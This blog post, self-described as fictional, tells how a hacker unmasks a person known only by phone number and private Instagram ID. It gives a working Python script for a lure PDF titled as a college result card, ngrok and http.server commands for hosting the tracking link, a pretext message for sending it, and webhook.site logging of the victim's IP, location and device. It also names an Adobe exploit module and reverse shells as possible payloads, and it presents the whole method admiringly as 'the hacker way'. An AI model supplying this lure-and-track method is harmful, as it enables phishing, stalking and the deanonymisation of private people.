How a PDF Stole a Life — A Hacker’s Mental Game
Introduction
What if you had only a phone number and a private Instagram ID…
No name. No bio. No display picture.
No social media activity. No Google footprint.
Nothing.
Could you still find out who they are, where they live, and what they do?
An ethical hacker took on this challenge —
No tools. No Kali. No Google.
Only Termux. Only Python. Only the brain.
And what happened next was something even he didn’t expect...
Phase 1: No Tools, Just Mind
Let’s start with what we had:
Phone number (no Truecaller data)
Instagram ID (private, no bio, no DP)
Most people would quit.
But hackers don’t chase people — they bait them.
Phase 2: The Trap — Social Engineering
Instead of brute-forcing data, the hacker planned a psychological attack.
He designed a PDF file with a fake title:
> “Result Card - College Fall Term 2025.pdf”
It was crafted using Python in Termux:
from reportlab.pdfgen import canvas
def create_pdf():
c = canvas.Canvas("result_card.pdf")
c.drawString(100, 750, "College Result Report")
c.drawString(100, 730, "Check your score here:")
c.drawString(100, 710, "http://your-ngrok-link.ngrok.io/verify?id=235")
c.save()
create_pdf()
The PDF looked clean. But the link was a trap — hosted on Termux using:
python3 -m http.server 8080
Then exposed using Ngrok:
ngrok http 8080
Phase 3: The Click
The hacker sent the PDF file to the target via email (or anonymous Insta DM):
> “Hey, I think this is your result file. I found it on a college server.”
Curiosity always wins.
And when the victim clicked…
BOOM.
Phase 4: The Payload
The hacker had set up a webhook logger (using webhook.site) to capture:
IP Address
Location (approx via IP)
Device Info
Browser Type
OS Platform
Time of Access
All of this from just a PDF click.
Sample Log:
IP: 39.50.93.XXX
Device: Android
Browser: Chrome Mobile
Location: Lahore, Punjab, Pakistan
Access Time: 10:43 AM
Referrer: Instagram App
What If It Was Malicious? (Hypothetical)
If the hacker had bad intentions, the PDF could have contained:
A reverse shell
A keylogger
Script to steal saved files
Or a full system exploit (like exploit/windows/fileformat/adobe_cooltype_sing)
But this case?
It was just a test of skill. A hacker’s mental challenge.
Moral of the Story
The strongest hacking tool isn’t a program.
It’s psychology.
Social engineering is more powerful than any brute-force script.
Even a basic Python script in Termux can expose identities —
If used with the right bait, brain, and timing.
Educational Note
This blog post is fictional and for ethical educational purposes only.
Never use hacking skills to harm, stalk, or violate privacy.
Use them to learn, protect, and educate others about cyber risks.
Final thoughts
One day you’ll face a locked door with no key.
You can keep pushing…
Or you can convince someone to open it for you.
That’s the hacker way.
>Want to learn about social Engineering check out my blog on Social Engineering Attacks: The Human Side of Hacking
https://theethicalexploit.blogspot.com/2025/04/social-engineering-attacks-human-side.html
Comments
Post a Comment